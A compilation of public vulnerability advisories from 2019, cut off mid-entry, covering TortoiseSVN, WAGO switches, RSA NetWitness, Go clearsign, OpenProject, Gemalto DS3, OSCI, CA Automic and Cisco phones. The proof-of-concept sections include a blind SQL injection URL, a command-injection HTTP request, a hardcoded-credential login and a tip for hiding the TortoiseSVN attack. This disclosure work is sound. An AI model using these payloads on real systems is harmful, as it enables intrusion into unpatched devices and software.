Document Title: === TortoiseSVN v1.12.1 - Remote Code Execution Vulnerability References (Source): https://www.vulnerability-lab.com/get_content.php?id=2188 Product: https://osdn.net/projects/tortoisesvn/storage/1.12.1/Application/TortoiseSVN-1.12.1.28628-x64-svn-1.12.2.msi/ Ticket: https://groups.google.com/forum/#!forum/tortoisesvn http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-14422 CVE-ID: === CVE-2019-14422 Release Date: = 2019-08-13 Vulnerability Laboratory ID (VL-ID): 2188 Common Vulnerability Scoring System: 8.8 Vulnerability Class: Code Execution Current Estimated Price: 4.000€ - 5.000€ Product & Service Introduction: === TortoiseSVN is a really easy to use Revision control / version control / source control software for Windows. It is based on Apache Subversion (SVN); TortoiseSVN provides a nice and easy user interface for Subversion. It is developed under the GPL. Which means it is completely free for anyone to use, including in a commercial environment, without any restriction. The source code is also freely available, so you can even develop your own version if you wish to. Since it's not an integration for a specific IDE like Visual Studio, Eclipse or others, you can use it with whatever development tools you like, and with any type of file. (Copy of the about page: https://tortoisesvn.net/about.html ) Abstract Advisory Information: == A vulnerability laboratory researcher (vxrl team) discovered a remote code execution vulnerability in the TortoiseSVN v1.12.1 software. Vulnerability Disclosure Timeline: == 2019-08-13: Public Disclosure (Vulnerability Laboratory) Affected Product(s): TortoiseSVN Product: TortoiseSVN - Software 1.12.1 Discovery Status: = Published Exploitation Technique: === Remote Severity Level: === High Authentication Type: Pre auth - no privileges User Interaction: = Low User Interaction Disclosure Type: Independent Security Research Technical Details & Description: A remote code execution vulnerability has been uncovered in the official TortoiseSVN v1.12.1 software. The vulnerability typ allows remote attackers to execute arbitrary codes to compromise a target computer system. The URI handler of TortoiseSVN (Tsvncmd:) allows a customised diff operation on Excel workbooks, which could be used to open remote workbooks without protection from macro security settings to execute arbitrary code. The `tsvncmd:command:diff?path:[file1]?path2:[file2]` will execute a customised diff on [file1] and [file2] based on the file extension. For xls files, it will execute the script `diff-xls.js` using wscript, which will open the two files for analysis without any macro security warning. An attacker can exploit this by putting a macro virus in a network drive, and force the victim to open the workbooks and execute the macro inside. Since the macro is triggered through wscript, to make the attack less visible, one could kill the wscript process and quit the excel program after the code was executed. Proof of Concept (PoC): === The vulnerability could be triggered by visiting a specially crafted URL via web browser. To reproduce the vulnerability, one could simply create a .url file or open the URL with a browsers, but a notification prompt may be shown for the latter case. Checkout the Repo with TortoiseSVN where VBoxSvrv is the remote network drive controlled by the attacker, v.xlsm is the macro virus and w.xlsx is just an empty excel workbook. Sources: https://www.vulnerability-lab.com/resources/documents/2188.rar Password: 23vxrl23 PoC: Video https://www.youtube.com/watch?v=spvRSC377vI Security Risk: == The security risk of the remote code execution vulnerability in the software component is estimated as high. Credits & Authors: == PingFanZettaKe [VXRL Team] - https://www.vulnerability-lab.com/show.php?user=PingFanZettaKe Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequenti
SEC Consult SA-20190612-0 :: Multiple vulnerabilities in WAGO 852 Industrial Managed Switch Series
SEC Consult Vulnerability Lab Security Advisory < 20190612-0 > === title: Multiple vulnerabilities product: WAGO 852 Industrial Managed Switch Series vulnerable version: 852-303: https://www.wago.com found: 2019-03-08 by: T. Weber (Office Vienna) IoT Inspector SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "New ideas are the driving force behind our success WAGO is a family-owned company headquartered in Minden, Germany. Independently operating for three generations, WAGO is the global leader of spring pressure electrical interconnect and automation solutions. For more than 60 years, WAGO has developed and produced innovative products for packaging, transportation, process, industrial and building automation markets amongst others. Aside from its innovations in spring pressure connection technology, WAGO has introduced numerous innovations that have revolutionized industry. Further ground-breaking inventions include: the WAGO-I/O-SYSTEM®, TOPJOB S® and WALL-NUTS®." Source: http://www.wago.us/wago/ Business recommendation: SEC Consult recommends to immediately apply the available patches from the vendor. A thorough security review should be performed by security professionals to identify further potential security issues. Vulnerability overview/description: --- The industrial managed switch series 852 from WAGO is affected by multiple vulnerabilities such as old software components embedded in the firmware. Furthermore, hardcoded password hashes and credentials were also found by doing an automated scan with IoT Inspector. Two vulnerabilities (CVE-2017-16544 and CVE-2015-0235) were verified by emulating the device with the MEDUSA scaleable firmware runtime. The validity of the password hashes and the embedded keys were also verified by emulating the device. 1) Known BusyBox Vulnerabilities The used BusyBox toolkit in version 1.12.0 is outdated and contains multiple known vulnerabilities. The outdated version was found by IoT Inspector. One of the discovered vulnerabilities (CVE-2017-16544) was verified by using the MEDUSA scaleable firmware runtime. 2) Known GNU glibc Vulnerabilities The used GNU glibc in version 2.8 is outdated and contains multiple known vulnerabilities. The outdated version was found by IoT Inspector. One of the discovered vulnerabilities (CVE-2015-0235, "GHOST") was verified by using the MEDUSA scaleable firmware runtime. 3) Hardcoded Credentials (CVE-2019-12550) The device contains hardcoded users and passwords which can be used to login via SSH and Telnet. 4) Embedded Private Keys (CVE-2019-12549) The device contains hardcoded private keys for the SSH daemon. The fingerprint of the SSH host key from the corresponding SSH daemon matches to the embedded private key. Proof of concept: - 1) Known BusyBox Vulnerabilities BusyBox version 1.12.0 contains multiple CVEs like: CVE-2013-1813, CVE-2016-2148, CVE-2016-6301, CVE-2011-2716, CVE-2011-5325, CVE-2015-9261, CVE-2016-2147 and more. The BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on an emulated device. A file with the name "\ectest\n\e]55;test.txt\a" was created to trigger the vulnerability. --- # ls "pressing " test ]55;test.txt # --- 2) Known GNU glibc Vulnerabilities GNU glibc version 2.8 contains multiple CVEs like: CVE-2010-0296, CVE-2010-3856, CVE-2012-4412, CVE-2014-4043, CVE-2014-9402, CVE-2014-9761, CVE-2014-9984, CVE-2015-1472 and more. The gethostbyname buffer overflow vulnerability (GHOST) was checked with the help of the exploit code from https://seclists.org/oss-sec/2015/q1/274. It was compiled and executed on the emulated device to test the system. 3) Hardcoded Credentials (CVE-2019-12550) The following credentials were found in the 'passwd' file of the firmware: root No password is set for the account [EMPTY PASSWORD] admin By using these credentials, it's possible to connect via Telnet and SSH on the emulated device. Example for Telnet: --- [root@localhost ~]# telnet 192.168.0.133 Trying 192.168.0.133... Connected to 192.168.0.133. Escape cha
SEC Consult SA-20190515-0 :: Authorization Bypass in RSA NetWitness (@sec_consult)
SEC Consult Vulnerability Lab Security Advisory < 20190515-0 > === title: Authorization Bypass product: RSA NetWitness vulnerable version: <10.6.6.1, <11.2.1.1 fixed version: 10.6.6.1, 11.2.1.1 CVE number: CVE-2019-3724 impact: Medium homepage: https://www.rsa.com found: 2018-09-18 by: Mantas Juskauskas (Office Vilnius) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "RSA provides more than 30,000 customers around the world with the essential security capabilities to protect their most valuable assets from cyber threats. With RSA's award-winning products, organizations effectively detect, investigate, and respond to advanced attacks; confirm and manage identities; and ultimately, reduce IP theft, fraud, and cybercrime." Source: https://www.rsa.com/en-us/company/about Business recommendation: By exploiting the vulnerability documented in this advisory an unauthorized attacker can access an administrative resource that may contain plain text credentials to a 3rd party system. The vendor provides a patch which should be installed on affected systems. Vulnerability overview/description: --- The authorization mechanism provided by the platform is prone to an authorization bypass vulnerability, which can be easily exploited by authenticated (but low privileged) remote attackers for gaining access to administrative information including plaintext passwords. Proof of concept: - A logged-in low privileged user (e.g. with role Analyst) is able to access an administrative resource by calling the following URL: https://[host]/admin/system/whois/properties After the above URL is accessed, the server returns the following HTTP response that contains sensitive information to a 3rd party whois service including plaintext passwords: HTTP/1.1 200 OK Server: nginx Date: [snip] Content-Type: application/json;charset=UTF-8 Connection: close X-Frame-Options: SAMEORIGIN Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 ; includeSubDomains X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Set-Cookie: [snip] Content-Length: 795 {"success":true,"data":{"queryUrl":"https://[snip]","authUrl":"https://[snip]","userId":"[snip]","pw":"[snip]","allowedRequests":100,"allowedRequestsInterval":60,"queueMaxSize":10,"cacheMaxSize":5,"refreshInterval":30,"waitForHttpRequests":true,"settings":{"query-url":"https://[snip]","queue-max-size":10,"password":"[snip]","allowed-requests":100,"auth-url":"https://[snip]","user-id":"[snip]","refresh-interval-seconds":{"seconds":2592000,"milliSeconds":259200},"cache-max-size":5,"wait-for-http-request":true,"allowed-requests-interval-seconds":{"seconds":60,"milliSeconds":6 Vulnerable / tested versions: - The identified vulnerability has been verified to exist in the RSA NetWitness platform, version 11.1.0.1. According to the vendor, platform version 10 is also affected. The following versions are vulnerable: * <10.6.6.1 * <11.2.1.1 Vendor contact timeline: 2018-10-01: Contacting vendor through PGP via sec...@dell.com 2018-10-02: Vendor acknowledges the information was received, forwards the info to the relevant department 2018-10-11: Vendor confirms the impact of the authorization issue, starts to work on the remediation timeline 2018-10-15: Vendor provides additional information 2018-10-22: Contacting vendor to provide the remediation timeline 2018-10-23: Further email exchange related to the remediation timeline 2019-01-18: Vendor provides an update on the fix timeline 2019-03-05: Asking for a status update 2019-03-06: Vendor provides a status update on the release, patch for platform version 11 will be released in March, version 10 Mid-April 2019-04-01: Asking for a specific release date & further status update 2019-04-01: Vendor: release is scheduled for 23rd April 2019, but may change, they will inform us 2019-05
SEC Consult SA-20190513-0 :: Cleartext message spoofing in supplementary Go Cryptography Libraries (@sec_consult)
SEC Consult Vulnerability Lab Security Advisory < 20190513-0 > === title: Cleartext message spoofing product: Supplementary Go Cryptography Libraries vulnerable version: commit a5d413f7728c81fb97d96a2b722368945f651e78 branch master (https://github.com/golang/crypto.git) fixed version: commit c05e17bb3b2dca130fc919668a96b4bec9eb9442 CVE number: CVE-2019-11841 impact: High homepage: https://golang.org found: 2019-03-28 by: Aida Mynzhasova (Office Berlin) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "Package clearsign generates and processes OpenPGP, clear-signed data. See RFC 4880, section 7. Clearsigned messages are cryptographically signed, but the contents of the message are kept in plaintext so that it can be read without special tools." Source: https://godoc.org/golang.org/x/crypto/openpgp/clearsign Business recommendation: During a short security test, SEC Consult found a severe security vulnerability in the clearsign package of supplementary Go cryptography libraries. This vulnerability could allow an attacker: - to lead a victim to believe the signature was generated using a different message digest algorithm than what was actually used; - to spoof clearsign OpenPGP messages by prepending arbitrary text to cleartext messages without invalidating the signatures. Vulnerability overview/description: --- 1) Cleartext message spoofing According to RFC 4880 chapter 7 the cleartext signed message can contain one or more optional "Hash" Armor Headers. The "Hash" Armor Header specifies the message digest algorithm(s) used for the signature. However, the package "clearsign" in supplementary Go cryptography libraries ignores the value of this header which allows an attacker to spoof it. Thereby an attacker can lead a victim to believe the signature was generated using a different message digest algorithm than what was actually used. Moreover, since the library skips Armor Header parsing in general, an attacker can not only embed arbitrary Armor Headers, but also prepend arbitrary text to cleartext messages without invalidating the signatures. Proof of concept: - 1) Cleartext message spoofing The following cleartext message with a valid SHA-1 signature was generated using GnuPG: (content of no_spoof.asc file): -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Message to be signed -BEGIN PGP SIGNATURE- iQEzBAEBAgAdFiEEAXWUn665cAXgInLZXVs62dBO+u4FAlyeCMMACgkQXVs62dBO +u6WeQgAvOTZAkwtXCZ2woIbHk+g3fgOiCOF8YtXgZCyDYZgR/JIf1+iCh7lWAjq 9/JcnifNB9lX6hyxy4qoT8loLAHNeoUzSkKiliRMcQFhtfCPInRCRtAnKDfkiA5N 0C9CesJYXoASBRafUgxeI7Q29tVdPNC8WVjJtA72yafu4b63TXKdCcu+TCHtH5lV l0rqS1JET/+UGycO+gbvegsAoNhmQp8qkFnJTTS6kJgmCs9TJlAmeX1wT8V5f5L+ 7pRe45ZBmlA7oi4lylvIp+WG1KJVgrPzeQOkybF2rFRuMxjlvqfO1/4lLrtXgA/7 v8H3ZsqUV9T/HNx5bFPOQJjbOhBVRg== =Bb6N -END PGP SIGNATURE- Then the message was tampered by changing the value of the "Hash" Armor Header from SHA-1 to SHA-512: (content of hash_spoof.asc file): -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Message to be signed -BEGIN PGP SIGNATURE- iQEzBAEBAgAdFiEEAXWUn665cAXgInLZXVs62dBO+u4FAlyeCMMACgkQXVs62dBO +u6WeQgAvOTZAkwtXCZ2woIbHk+g3fgOiCOF8YtXgZCyDYZgR/JIf1+iCh7lWAjq 9/JcnifNB9lX6hyxy4qoT8loLAHNeoUzSkKiliRMcQFhtfCPInRCRtAnKDfkiA5N 0C9CesJYXoASBRafUgxeI7Q29tVdPNC8WVjJtA72yafu4b63TXKdCcu+TCHtH5lV l0rqS1JET/+UGycO+gbvegsAoNhmQp8qkFnJTTS6kJgmCs9TJlAmeX1wT8V5f5L+ 7pRe45ZBmlA7oi4lylvIp+WG1KJVgrPzeQOkybF2rFRuMxjlvqfO1/4lLrtXgA/7 v8H3ZsqUV9T/HNx5bFPOQJjbOhBVRg== =Bb6N -END PGP SIGNATURE- Finally, a string containing Unicode-encoded "LINE TABULATION" was embedded in the Armor Header of the message: (content of cleartext_spoof.asc file): -BEGIN PGP SIGNED MESSAGE- Hash: SHA512\u000bThis data is part of the header Message to be signed -BEGIN PGP SIGNATURE- iQEzBAEBAgAdFiEEAXWUn665cAXgInLZXVs62dBO+u4FAlyeCMMACgkQXVs62dBO +u6WeQgAvOTZAkwtXCZ2woIbHk+g3fgOiCOF8YtXgZCyDYZgR/JIf1+iCh7lWAjq 9/JcnifNB9lX6hyxy4qoT8loLAHNeoUzSkKiliRMcQFhtfCPInRCRtAnKDfkiA5N 0C9CesJYXoASBRafUgxeI7Q29tVdPNC8WVjJtA72yafu4b63TXKdCcu+TCHtH5lV l0rqS1JET/+UGycO+gbvegsAoNhmQp8qkFnJTTS6kJgmCs9TJlAmeX1wT8V5f5L+ 7pRe45ZBmlA7oi4lylvIp+WG1KJVgrPzeQOkybF2rFRuMxjlvqfO1/4lLrtXgA/7 v8H3ZsqUV9T/HNx5bFPOQJjbOhBVRg== =Bb6N -END PGP SIGNATURE- When inserting the "LINE TABULATION" character, the header text after the attached character looks as if it were p
SEC Consult SA-20190510-0 :: Unauthenticated SQL Injection vulnerability in OpenProject
SEC Consult Vulnerability Lab Security Advisory < 20190510-0 > === title: Unauthenticated SQL Injection vulnerability product: OpenProject vulnerable version: 5.0.0 - 8.3.1 fixed version: 8.3.2 & 9.0.0 CVE number: CVE-2019-11600 impact: Critical homepage: https://www.openproject.org found: 2019-04-17 by: T. Soo (Office Bangkok) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "OpenProject is the leading open source project management software. Support your project management process along the entire project life cycle: From project initiation to closure." Source: https://www.openproject.org/ Business recommendation: The vendor provides a patch which should be applied immediately. An in-depth security analysis performed by security professionals is highly advised, as the software may be affected from further security issues. Vulnerability overview/description: --- An SQL injection vulnerability has been identified in the web "activities API". An unauthenticated attacker could successfully perform an attack to extract potentially sensitive information from the database if OpenProject is configured not to require authentication for API access. Proof of concept: - Requesting the following URL will trigger a time delay as a proof of concept for exploiting the blind SQL injection: http:///api/v3/activities/1)%20AND%203281%3d(SELECT%203281%20FROM%20PG_SLEEP(1))%20AND%20(%3d Vulnerable / tested versions: - The vulnerability has been identified in OpenProject version 8.3.1 which was the most current version at the time of discovery. According to the vendor all versions between 5.0.0 and 8.3.1 are affected. Older versions (< 5.0.0) are not vulnerable. Vendor contact timeline: 2019-04-30: Contacting vendor through secur...@openproject.com 2019-04-30: A patch is published in version 8.3.2 2019-05-06: Vendor publishes further details 2019-05-10: Release of security advisory Solution: - The vendor provides a patched version 8.3.2 and a security notice with further information: https://www.openproject.org/release-notes/openproject-8-3-2 https://groups.google.com/forum/#!msg/openproject-security/XlucAJMxmzM/hESpOaFVAwAJ Workaround: --- None Advisory URL: - https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/career/index.html Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/contact/index.html ~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Thanaphon Soo / @2019 smime.p7s Description: S/MIME Cryptographic Signature
SEC Consult SA-20190509-0 :: Multiple Vulnerabilities in Gemalto (Thales Group) DS3 Authentication Server / Ezio Server
SEC Consult Vulnerability Lab Security Advisory < 20190509-0 > === title: Multiple Vulnerabilities product: Gemalto (Thales Group) DS3 Authentication Server / Ezio Server vulnerable version: Ezio DS3 server https://www.gemalto.com found: 2019-02-11 by: TING Meng Yean (Office Singapore) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- DS3 Authentication Server is an appliance that provides authentication and end-to-end encryption for online banking and remote transactions. DS3 has been acquired by Gemalto, and the Authentication Server is now known as the Gemalto Ezio Server. Gemalto is now part of the Thales Group. Source: http://www.fisid.ch/products/ds3-main-products.html Source: https://www.gemalto.com/financial/ebanking/ezio-server Source: https://www.thalesgroup.com/en/group/journalist/press-release/thales-completes-acquisition-gemalto-become-global-leader-digital Business recommendation: The vendor provides a patch and users of this product are urged to upgrade to the latest version available. An in-depth security analysis performed by security professionals is highly advised, as the software may be affected from further security issues. Vulnerability overview/description: --- The DS3 Authentication Server is prone to several security issues as described below that when combined, allows a low-privileged application user to upload a JSP web shell with the access rights of the lower privileged Linux system user "asadmin". The CVSSv3 scores have been provided by the vendor. 1) Semi-Blind OS Command Injection (Post-authenticated) - CVE-2019-9156 - CWE-78 - CVSSv3: 6.8 (Medium) https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L The DS3 Authentication Server provides several administration tools to perform connectivity checks. "TestTelnetConnection.jsp" does not correctly validate the user input for the "HOST_NAME" and "PORT_NUMBER" parameters, allowing an attacker to execute arbitrary commands on the server side with the privileges of the local system user "asadmin". 2) Limited Local File Disclosure (LFD) (Post-authenticated) - CVE-2019-9157 - CWE-538 - CVSSv3: 5.7 (Medium) https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N The DS3 Authentication Server provides several administration tools to check the system's access and error logs. "TailLogs.jsp" does not correctly validate the user input for the "LOG_TYPE" parameter, allowing an attacker to read arbitrary local files with the privileges of the local system user "asadmin". 3) Broken Access Control (Post-authenticated) - CVE-2019-9158 - CWE-284 - CVSSv3: 5.7 (Medium) https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N The DS3 Authentication Server provides several permission groups, granting different levels of privileges, from the administrative "dsssAdmin" group to the low privileged "READ_ONLY" group. A user with the "dsssAdmin" group can see more functions in the menu of the web portal than a user with the "READ_ONLY" group. However, the user with the "READ_ONLY" group can access some "dsssAdmin" functions by replaying the POST or GET request directly. Proof of concept: - 1) Semi-Blind OS Command Injection (Post-authenticated) (CVE-2019-9156) This POC was performed using a user with the "READ_ONLY" group permission. This exploit also has the following two restrictions: 1) The bash commands injected cannot contain any space (' '/%20). 2) The output of the bash commands injected must be null or cannot contain any space (' '/%20). However, the tester was able to create complex bash commands payload without any space (' '/%20) by using a bash trick. The simple OS command payload "whoami" injected into the "HOST_NAME" parameter and the HTTP response with the result of the payload "asadmin" mixed in. Please note that the OS command payload is enclosed with the `` characters. POST /ServerAdmin/TestTelnetConnection.jsp HTTP/1.1 Host: $IP Cookie: JSESSIONID= Content-Type: application/x-www-form-urlencoded Content-Length: 132 CSRFTOKEN=_NAME=127.0.0.1`whoami`_NUMBER=8443_RESULTS=%0D%0A%09%09%09%09%09%09 HTTP/1.1 200 OK Str
SEC Consult SA-20190205-0 :: Multiple vulnerabilities in OSCI-Transport Library 1.2 for German e-Government
A blog post with further information has been released on this topic as well: https://r.sec-consult.com/osci SEC Consult Vulnerability Lab Security Advisory < 20190205-0 > === title: Multiple vulnerabilities product: OSCI-Transport Library 1.2 for German e-Government vulnerable version: <=1.8.1 fixed version: 1.8.3 CVE number: - impact: low - critical (highly dependent on the usage scenario) homepage: http://www.xoev.de found: 2018-09 by: W. Ettlinger (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- (German) "Mit der Spezifikation des Protokolls OSCI–Transport in der Version 1.2 wird ein sicheres, herstellerunabhängiges und interoperables Datenaustauschformat beschrieben. Um die Implementierung für Anwender in der öffentlichen Verwaltung sowie der Fachverfahrenshersteller zu erleichtern, wird die OSCI 1.2 Bibliothek angeboten: Die Bibliothek implementiert OSCI–Transport in der Version 1.2 und ist damit unabhängig von Fachinhalten. Sie ist Bestandteil der OSCI-Transport Infrastruktur. Die OSCI-Transport-Bibliothek soll in Fachverfahren (auf Verwaltungsseite) oder Clientsystemen (auf Kundenseite) implementiert werden." Source: https://www.xoev.de/die_standards/osci_transport/osci_transport_1_2/osci_1_2_bibliothek-2310 Business recommendation: The OSCI 1.2 Transport Library is intended to provide a secure message exchange channel over an untrusted network (i.e. the Internet) for German government agencies. In 2017 SEC Consult found several critical security vulnerabilities in the OSCI 1.2 Transport library version 1.6.1. These vulnerabilities have been addressed in version 1.7.1. Further details to these vulnerabilities can be found here: https://www.sec-consult.com/en/blog/2017/06/german-e-government-details-vulnerabilities/ In 2018 SEC Consult identified vulnerabilities in this library again. An attacker could use these vulnerabilities to forge signatures of request-and-response-signed and request-and-response-encrypted messages. Whether there is an impact to the content-signature and content-encryption was not fully examined! As the newly identified vulnerabilities are similar to the vulnerabilities identified in 2017 and due to high complexity of this library, SEC Consult suspects further vulnerabilities that have not yet been discovered. Therefore, SEC Consult, strongly recommends KoSIT and its partners to conduct a full security audit of the software component. Vulnerability overview/description: --- 1) Insecure Cryptographic Algorithm KoSIT is in the process of replacing legacy encryption algorithms with AES-GCM. Currently, the OCSI 1.2 Transport library still supports the following legacy encryption algorithms: * http://www.w3.org/2001/04/xmlenc#tripledes-cbc * http://www.w3.org/2001/04/xmlenc#aes128-cbc * http://www.w3.org/2001/04/xmlenc#aes192-cbc * http://www.w3.org/2001/04/xmlenc#aes256-cbc All of these algorithms are no longer recommended by the W3C: "Note: Use of AES GCM is strongly recommended over any CBC block encryption algorithms as recent advances in cryptanalysis [...] have cast doubt on the ability of CBC block encryption algorithms to protect plain text when used with XML Encryption" (https://www.w3.org/TR/xmlenc-core1/) Although these have been marked as deprecated, AES256-CBC is still used by default (see Constants.DEFAULT_SYMMETRIC_CIPHER_ALGORITHM). The Padding Oracle attack that was demonstrated previously by SEC Consult was found to be no longer exploitable trivially. However, another approach was found that allows an attacker to bypass transport encryption. This attack abuses the fact that the server leaks whether a decrypted string contains a colon (more specifically whether it is a valid MIME-Header in the form of :). By sending multiple requests and observing whether the decrypted string contains a colon, an attacker can narrow down the possible values for a single plain text character. When the number of possible values is one, the plain text byte is known. The attacker can use this approach to decrypt all characters of a given cipher text. 2) Signature Bypass SEC Consult previously demonstrated an XML Signature Wrapping attack. While this exact attack is no longer possible, another similar attack was identified. XML signatures are constructed as follows: * an element "SignedInfo" contains multiple "Reference" elements, each referring to a signed element. The contents
SEC Consult SA-20190124-0 :: Cross-site scripting in CA Automic Workload Automation Web Interface (AWI)
SEC Consult Vulnerability Lab Security Advisory < 20190124-0 > === title: Cross-site scripting product: CA Automic Workload Automation Web Interface (AWI) (formerly Automic Automation Engine, UC4) vulnerable version: 12.0, 12.1, 12.2 fixed version: 12.0.6 HF2, 12.1.3 HF3, 12.2.1 HF1 CVE number: CVE-2019-6504 impact: medium homepage: https://www.ca.com found: 2018-10-15 by: Marc Nimmerrichter (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "The modern enterprise needs to orchestrate a complex, diverse landscape of applications, platforms and technologies. Workload automation can prove a critical differentiator, but only if it provides intelligent automation driven by data analytics. [...] CA Automic Workload Automation gives you the agility, speed, visibility and scalability needed to respond to the constantly changing technology landscape. It centrally manages and automates the execution of business processes end-to-end; across mainframe, cloud and hybrid environments in a way that never stops—even when doing an upgrade to the next version." Source: https://www.ca.com/us/products/workload-automation-solution.html Business recommendation: Be aware that restrictions on privileges can be bypassed and that attackers may be able to take over other users' accounts. SEC Consult recommends to apply the vendor patch as soon as possible. Vulnerability overview/description: --- The Automation Engine Web Interface, short AWI, is susceptible to a persistent cross-site scripting attack (XSS). The origin of this vulnerability is in an outdated version of the Vaadin framework (version 7.7.9), which is heavily used in the implementation of the UI. This version of the Vaadin framework is vulnerable to an XSS vulnerability in tooltips [1]. If attackers can control the content of tooltips created with the framework, they can execute arbitrary JavaScript code in the context of the user viewing the tooltip. AWI uses tooltips for various data-fields, e.g. for the title of objects created. Thus, if a user has the privilege to create or edit objects, they can inject JavaScript code, which will get executed by other users if they move their cursor over the text containing the tooltip. [1] https://github.com/vaadin/framework/issues/8731 Proof of concept: - The vulnerability can be reproduced by creating/editing any object in AWI and using a normal JavaScript payload, e.g. with an onerror handler. Because tooltips are only shown in AWI when the text length exceeds the column width, the text needs to be padded with some sample-text to make sure the JavaScript code gets executed. Vulnerable / tested versions: - The tested version of AWI was 12.2.0. Vendor contact timeline: 2018-10-18: SEC Consult contacts vendor through v...@ca.com via encrypted email. 2018-10-25: Vendor confirms the receipt of the vulnerability information. 2018-11-22: Vendor confirms the vulnerability and asks for postponement of advisory release date. 2018-12-11: Vendor provides planned patch numbers. 2018-01-17: Vendor informs SEC Consult that patches have been published. 2019-01-18: CA Technologies and SEC Consult define January 24th 2019 as release date for SEC Consult advisory and CA Technologies Security Notice. 2019-01-24: Public release of security advisory Solution: - The vendor provides patched versions: Automic.Web.Interface 12.0.6 HF2 Automic.Web.Interface 12.1.3 HF3 Automic.Web.Interface 12.2.1 HF1 Available from: https://downloads.automic.com/ The vendor released a security advisory which is available here: https://support.ca.com/us/product-content/recommended-reading/security-notices/CA20190124-01-security-notice-for-ca-automic-workload-automation.html Workaround: --- None Advisory URL: - https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive tech
SEC Consult SA-20190109-0 :: Multiple Vulnerabilities in Cisco VoIP Phones (88xx series)
SEC Consult Vulnerability Lab Security Advisory < 20190109-0 > === title: Multiple Vulnerabilities product: Cisco VoIP Phones, e.g. models 88XX vulnerable version: See list of vulnerable devices/firmwares below fixed version: 12.5.1 MN CVE number: CVE-2018-0461 impact: high homepage: https://www.cisco.com found: 10/2018 by: W. Schober, IoT Inspector (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "The Cisco IP Phone 8800 Series is a great fit for businesses of all sizes seeking secure, high-quality, full-featured VoIP. Select models provide affordable entry to HD video and support for highly-active, in-campus mobile workers." Source: https://www.cisco.com/c/en/us/products/collaboration-endpoints/unified-ip-phone-8800-series/index.html Business recommendation: SEC Consult recommends to update the devices to the newest firmware (12.5.1 MN), where all the documented issues are fixed according to the vendor. We want to thank Cisco for the very professional response and great coordination. Vulnerability overview/description: --- 1) Arbitrary Script Injection The VOIP phones can be managed directly via the integrated keyboard and the built-in screen. In the configuration menu a few spots allow users to input text via the integrated keyboard into text boxes (e.g. Hostname). Those text input fields are prone to JavaScript-like code injection. An attacker is able to inject arbitrary payloads via the T9 keyboard. 2) Hard coded and weak secrets (Identified during an automated firmware analysis by IoT Inspector) The firmware, which is directly served from Cisco, contains multiple hard coded password hashes. They are stored in the /etc/passwd file and are hashed using an outdated algorithm (UNIX MD5+salt). The users are not documented anywhere. Access via SSH using those credentials is possible. Due to the outdated algorithm in use (UNIX MD5+Salt) and the very weak password it was easily possible to brute-force the password within seconds. 3) Undocumented debug functionality During a manual firmware analysis a few undocumented endpoints in the built-in web application, which is running on the VOIP phone, were identified. Those routes lead to parts of the web application that are neither documented nor officially mentioned anywhere by Cisco. Those parts of the web application allow an attacker to debug the device and create memory dumps. 4) Various outdated components with known vulnerabilities During the check a lot of outdated components were identified by their version numbers. It is not known which patches got backported by the vendor but Cisco mentioned that they have implemented some. The potentially affected components are: -) wpa_supplicant -) BusyBox -) Dnsmasq -) OpenSSL -) OpenSSH -) Linux Kernel Privilege Escalation “pp_key” -) Linux Kernel Privilege Escalation “Mempodipper” -) Multiple Linux Kernel CVE entries Please take a look at the IoT Inspector report for details: https://r.sec-consult.com/iotinspectorcisco Proof of concept: - 1) Arbitrary Script Injection A 